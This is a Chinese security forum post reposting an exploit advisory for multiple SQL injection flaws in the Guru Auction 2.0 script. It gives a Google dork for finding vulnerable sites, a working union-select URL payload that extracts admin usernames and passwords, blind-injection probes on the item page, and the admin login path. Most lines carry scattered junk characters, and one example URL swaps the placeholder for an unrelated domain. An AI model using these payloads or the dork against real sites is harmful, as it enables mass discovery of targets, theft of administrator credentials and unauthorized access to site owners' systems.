找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2146|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities7 ?6 m# `2 }, k; X/ n% y

. R- _' q% n& M  q作者     : v3n0m: E/ T$ L  b. V4 T+ ]
应用 : Guru Auction 2.0
/ }- f" x' q0 u0 h  W' Z: v5 {Price       : $49# e- L6 {- N) V7 Y( M; M
Vendor      : http://www.guruscript.com/% s$ Z0 ~( C! G  t9 B
Google Dork : inurl:subcat.php?cate_id=/ T$ ~+ X" u2 C. w( c

+ Q4 g( n) o+ z. t0 RSQLi p0c:7 ]- `3 i; @1 U# J4 C& q$ _
~~~~~~~~~~8 Z+ ~" V. P5 K  a& k6 F
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
; u3 D1 T. a5 \7 u) O: O& v* c ( X- e3 A8 ^# u6 ]" _
- I+ c1 l5 M" p+ \$ J1 m
盲注 p0c:
8 r) W$ K( q0 F~~~~~~~~~~2 S+ B% z* o/ R4 a$ J
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true2 K' r1 G' K; H, F% k
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false& z5 N$ }$ d* H2 C5 b
% T; k9 v+ u8 g6 _/ T5 l5 r, V
管理登录入口:1 R2 a2 p/ g2 @3 ~; e
~~~~~~~~~~) G- z( d$ Z- |
http://domain.tld/[path]/admin/5 c! h1 _$ i. y7 w9 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表